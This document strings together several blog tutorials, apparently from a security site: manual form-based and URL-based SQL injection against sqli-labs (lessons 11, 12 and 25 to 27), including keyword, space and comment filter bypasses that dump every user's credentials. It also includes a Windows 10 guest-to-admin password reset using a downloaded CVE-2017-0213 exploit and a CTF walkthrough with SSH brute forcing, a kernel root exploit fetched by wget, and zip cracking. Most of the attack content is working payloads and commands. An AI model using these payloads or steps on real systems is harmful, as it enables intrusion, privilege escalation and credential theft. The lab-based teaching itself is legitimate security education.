Form Based SQL Injection Manually

In our previous article we had perform Form Based SQL injection using sqlmap but today we are going to perform Form Based SQL injection  in DHAKKAN manually. There are so many example related to login form like: Facebook login; Gmail login; other online accounts which may ask you to submit your information as username and password.

Let’s start!! 

LESSON 11

 This lesson is much similar to lesson 1,2,3,4 if you not familiar to these lessons then please go through it from here. You will come to know how to perform SQL Injection manually step by step in order to retrieve the data from inside the database system.

Lesson 11 is regarding POST error based single quotes (‘) string so when you will explore this lab on the browser you will observe that it contains text field for username and password to login inside web server. As we are not true user so we don’t know the correct username and password but being hacker we always wish to get inside the database with help of SQL injection. Therefore first we will test whether the database is vulnerable to SQL injection or not.

Since lesson itself sound as error based single quotes (‘) string, thus I had used single quotes () to break the query inside the text field of username then click on submit.

Username:      ’

 From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near ”” and password=” LIMIT 0,1’

Now we need to fix this query with help of # (hash) comment; so after adding single quotes (‘) add a hash function (#) to make it syntactically correct.

Username:  ‘   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

Username:  ‘ order by 1 #

Username:  ‘ order by 2 #

Username:  ‘ order by 3 #

 From screenshot you can see I received error at order by 3 which mean there are only two columns used in the backend query

Similarly insert query for union select in between and # to select both records.

Username:  ‘ union select 1,2 #

From screenshot you can see it also shown successfully logged in, now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security

Username:  ‘ union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  ‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query

Username:  ‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  ‘ union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about single quotes string error based injection in lesson 11.

Lesson 12

In some scenario you will try to use single quotes string for test SQL vulnerability or will go extend in order to break the query even after knowing that database is vulnerable but you will be not able to get break the query and receive error message because might the developer had blacklist the single quotes (‘) at the backend query.

Lesson 12 is similar to previous lesson 11 but here you will face failure if you used single quotes for breaking the query, since the chapter sound closed to post Error based double quotes string (“). Thus I had used double quotes () to break the query inside the text field of username then click on submit.

username: 

From the given screenshot you can see we have got error message (in blue color) which means the database is vulnerable to SQL injection. 

So we when break the query we get error message, now let me explain what this error message says.

The right syntax to use near ‘”””) and password=(“”) LIMIT 0,1’

Now we need to fix this query with help of ) closing parenthesis and  # (hash) comments; so after double quotes (“) add ) closing parenthesis  hash function (#) to make it syntactically correct.

username:  “)   #

From screenshot you can see it has shown login attempted failed though we have successfully fixed the blue color error message.

Now whatever statement you will insert in between ‘) and # the query will execute successfully with certain result according it. Now to find out number of columns used in the backend query we’ll use order by clause

username:  “) order by 3 #

From screenshot you can see I received error at order by 3 which means there are only two columns used in the backend query

Similarly insert query for union select in between ‘)and # to select both records.

Username:  “) union select 1,2 #

 From screenshot you can see it also shown successfully logged in, let’s now retrieve data from inside it.

Next query will fetch database name, it is as similar as in lesson 1 and from screenshot you can read the database name “security

Username:  “) union select 1,database() #

Through given below query we will be able to fetch tables name present inside database.

Username:  “) union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query

Username:  “) union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #

Their so many columns but we interested in username and password only.

At last execute following query to read all username and password inside the table users.

Username:  “) union select group_concat(username),group_concat(password) from users   #

Hence you can see we have not only retrieve single user credential but entire users credential now use them for login.

This is all about double quotes string error based injection in lesson 12.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Bypass Admin access through guest Account in windows 10

Open command prompt and check windows user account status using “whoami” command.

Account name is “joe” and account status is ‘DefaultAccount’ which is a non-administrator account type.

Try changing administrator using the ’net user’ command. You will see an error ‘Access is denied’

Now download “CVE-2017-0213_x64” from here and unzip in your PC. Go to the folder and you can find the .exe file, double click on it to run it.

The moment you double click on it, it will automatically open a new command prompt with administrator privileges.

Use ‘net user’ command to change the administrator account password. Message ‘The command completed successfully’ will appear. You have now successfully changed the administrator accounts password.

Author– Abhimanyu Dev is an Aspiring Cyber Security Expert Contact Here

Hack the Super Mario (CTF Challenge)

Hello friends!! Might you people have played THE SUPER MARIO game once in your childhood and no wonder if a thought have been strike in your mind to hack the game. So whatever you had thought today we are going to make it true and for that you guys need to download the new VM machine for super Mario from here.

The credit for developing this VM machine is goes to Mr_h4sh who has hide 2 flag inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

 As you know we always start with enumeration, therefore open the terminal in your kali Linux and go for aggressive scan with nmap.

nmap –p- -A 192.168.0.5

Since port 22 and port 8180 for service SSH and HTTP respectively therefore I choose port 8081 for enumeration but from screenshot you can see I didn’t get any remarkable result.

Dirb http://192.168.0.5:8180

Then I move for directory brute force attack using following command

Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the given below screenshot you can read it has shown a file name vhosts, let’s explore it through browser.

Now explore vhost in URL as  http://192.168.0.5:8180/vhosts here vhosts stand for virtual host it is method for hosting multiple domain on a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local  

Let’s add mario.supermariohost.local into /etc as new localhost

Cd etc

Vim hosts

Now type “192.168.0.5 mario.supermariohost.local” inside the vim editor to add it in the /etc/host and after then type wq to save it.

Now Type Cat hosts to check added host name Hence you from screenshot you can see it has been had added inside it successfully.

Then I visit mario.supermariohost.local on browser and finally got Mario as browser game but it is not working.

Since we know port 22 and 8081 was open and we didn’t get much information from enumeration of port 8081. Now we will move towards port 22 for SSH enumeration therefore I had prepared a dictionary in order to retrieve credential to login inside SSH server. 

Dictionary contains username which was the famous character of MARIO, you can check these name from Google also.

Inside text editor type following name: Mario; luigi; peach; toad; yoshi and save file as user on desktop.

Use john the ripper to generate dictionary of password using following command here –rules will enable the wordlist and –stdout will define a fix length of password to be generate on the desktop as pass.

John –wordlist : user –rules –stdout > pass

Finally we have username dictionary as user and password dictionary generated by john as pass, now we have to match perfect combination of user and pass in order to retrieve credential for SSH login. I had chosen hydra for password cracking, you can choose any other password cracking tool also.

Hydra –L user –P pass 192.168.0.5 ssh

From the given screenshot you read the matched combination of username: luigi and password: luigi1 for SSH server.

Now type following for SSH login

Ssh luigi@192.168.0.5

Password luigi1

Yeeppiii!!!!  Finally we have login inside SSH server.

Uname –a

Here we come to know that the version for linux  supermariohost 3.13.0; let’s checkout its exploit on Google.

Yes, there is an exploit for 3.13.0 overlayfs local root in ubuntu , download it from here inside your kali Linux.

Form screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation. 

Now type following command for downloading Mario.c inside target system.

wget http://192.168.0.6/mario.c

The file is successfully downloaded inside it now type another command to compile Mario.c

gcc Mario.c -o mario

./Mario

Id

Cd/root

Ls

Awesome!!! We have got root privilege and from screenshot you can see inside its directory I have got zip file as flag.zip

Now type following command to download flag.zip on the desktop of your kali Linux

scp /root/flag.zip root@192.168.0.6:/root/Desktop

Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt -u
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.

Unzip flag.zip

It will ask for password, give above password to unzip it and again if you notice the given image it contains flag.txt

Cat flag.txt

1st FLAG: Well done: D If you reached this it means you got root, congratulations.

Now follow the given below step in order to complete another challenge.

Iptables –L

Here from screenshot you can see a new network has been added on remote system.

arp –n

Now the target system has been forwarded on a new IP 192.168.122.112

Ls -la

Found a directory .bak

Cd /.bak

Ls

Cd users

Cd luigi

Ls

There are two files inside it let’s read them one by one

Cat message

Hi Luigi,

Since you’ve been messing around with my host, at this point I want to return the favour. This is a “war”, you “naughty” boy!

cat id_rsa.pub

The highlighted word in the given text may appear like a username for login into SSH server.

Let ensure by login into ssh -i id_rsa warluigi@192.168.1.122.112

Great!! All assumption had given positive result

Again check for kernel version

uname -a

Woooww!! It is same version now we can use our Mario.c exploit for root privilege. Hence repeat the above step as shown in images.

Wget http://192.168.0.6/maio.c

The file is successfully downloaded inside it now type another command to compile Mario.c

Gcc Mario.c –o Mario

./Mario

Id

Cd /root

Ls –la

Here I found two important files 1st hint.txt 2nd flag2.zip before going for unzip flag.zip we must look towards hint.txt file.

Cat .hint.txt

Peach Loves Me” it might be the password key for decrypting the flag2.zip file 

Now let download fla2g.zip on the desktop of kali Linux by using following again

Scp /root/flag2.zip root@192.168.0.6:/root/Desktop

Unzip flag2.zip

Now when it will ask for password key type “Peach Loves Me

It contains flag2.txt inside type cat flag2.txt to open this file.

2nd FLAG: Congratulations on your second flag!

  Wonderful!!! We have caught both flags

Rajat Chikara is An Ethical HackerCyber Security Expert, Penetration Tester, India.

How to Bypass SQL Injection Filter Manually

In previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. The reason behind that is the protection that developer had applied to prevent SQL injection, sometimes developer use filters to strip out few characters and OPERATORS from the user input before adding it to the query for SQL statement to prevent SQL Injection. Today’s article will help you to face such situations and will tell you how to bypass such filters. Here again we’ll be using DHAKKAN SQLI labs for practice.

 Let’s start!!

 LESSION 25

In Lab 25 OR and AND function are Blocked here we will try to bypass sql filter using their substitute.

function blacklist($id)

$id= preg_replace(‘/or/i’,””, $id);                              //strip out OR (non case sensitive)

$id= preg_replace(‘/AND/i’,””, $id);                         //Strip out AND (non case sensitive)

Since alphabetic word OR, AND are blacklisted, hence if we use AND 1=1 and OR 1=1 there would be no output therefore I had use %26%26 inside the query.

 Following are replacement for AND and OR

AND :   &&   %26%26 

OR  :  || 

Open the browser and type following SQL query  in URL

http://localhost:81/sqli/Less-25/?id=1′ %26%26 1=1 –+

From screenshot you can see we have successfully fixed the query for AND (&&) into URL encode as %26%26. Even when AND operator was filtered out.

Once the concept is clear to bypass AND filter later we need to alter the               SQL statement for retrieving database information.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,2,3 %26%26 1=1 –+   

Type following query to retrieve database name using union injection

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,database(),3 %26%26 1=1 –+

 hence you can see we have successfully get securtiy as database name as result.

 

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 –+

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name=’users’ %26%26 1=1 –+

Hence you can see it contains 4 columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

http://localhost:81/sqli/Less-25/?id=-1′ union select 1,group_concat(username),3 from users –+

From screenshot you can read the fetched data.

Hence in lesson 25 we have learn how to bypass AND, OR filter for retrieving information inside the database.

LESSION 26

You will find lab 26 more challenging because here space,Comments,OR and AND are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

preg_replace(‘/or/i’,””, $id);                                       //strip out OR (non case sensitive)

$id= preg_replace(‘/and/i’,””, $id);                          //Strip out AND (non case sensitive)

$id= preg_replace(‘/[\/\*]/’,””, $id);                       //strip out /*

$id= preg_replace(‘/[–]/’,””, $id);                            //Strip out —

$id= preg_replace(‘/[#]/’,””, $id);                             //Strip out #

$id= preg_replace(‘/[\s]/’,””, $id);                            //Strip out spaces

$id= preg_replace(‘/[\/\\\\]/’,””, $id);    //Strip out slashes

This lab has more filters as compared to lab 25  because here space,Comments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-26/?id=1’%a0%26%26’1=1

From screenshot you can see we have successfully fixed the query for SPACE into URL encode as %a0

Blanks = (‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’ ‘%a0’)

Once the concept is clear to bypass AND, OR and SPACE filter later we need to alter the                SQL statement for retrieving database information.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,2,3%a0%26%26’1=1

Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,database(),3%a0%26%26%’1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26’1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name=’users’%a0%26%26’1=1

Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81/sqli/Less-26/?id=0’%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0’1

Hence in lesson 26 we have learned how to bypass AND, OR, SPACE AND COMMENT filter for retrieving information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and Comments are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

$id= preg_replace(‘/[\/\*]/’,””, $id);                       //strip out /*

$id= preg_replace(‘/[–]/’,””, $id);                            //Strip out –.

$id= preg_replace(‘/[#]/’,””, $id);                                             //Strip out #.

$id= preg_replace(‘/[ +]/’,””, $id);                //Strip out spaces.

$id= preg_replace(‘/select/m’,””, $id);       //Strip out spaces.

$id= preg_replace(‘/[ +]/’,””, $id);                //Strip out spaces.

$id= preg_replace(‘/union/s’,””, $id);         //Strip out union

$id= preg_replace(‘/select/s’,””, $id);         //Strip out select

$id= preg_replace(‘/UNION/s’,””, $id);      //Strip out UNION

$id= preg_replace(‘/SELECT/s’,””, $id);       //Strip out SELECT

$id= preg_replace(‘/Union/s’,””, $id);         //Strip out Union

$id= preg_replace(‘/Select/s’,””, $id);         //Strip out select

This lab has more filters in addtion to lab 26  because here union, select, space andComments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-27/?id=1′ AND’1=1

 

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1’%a0UnIon%a0SeLect%a01,2,3%a0AND’1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1’%a0UnIon%a0SeLect%a01,2,3%a0AND’1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Now Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,database(),3%a0AND’1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND’1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name=’users’%a0AND’1=1

 Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81//sqli/Less-27/?id=0’%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name=’users’%a0AND’1=1

 Hence in lesson 27 we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for retrieving information inside the database.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...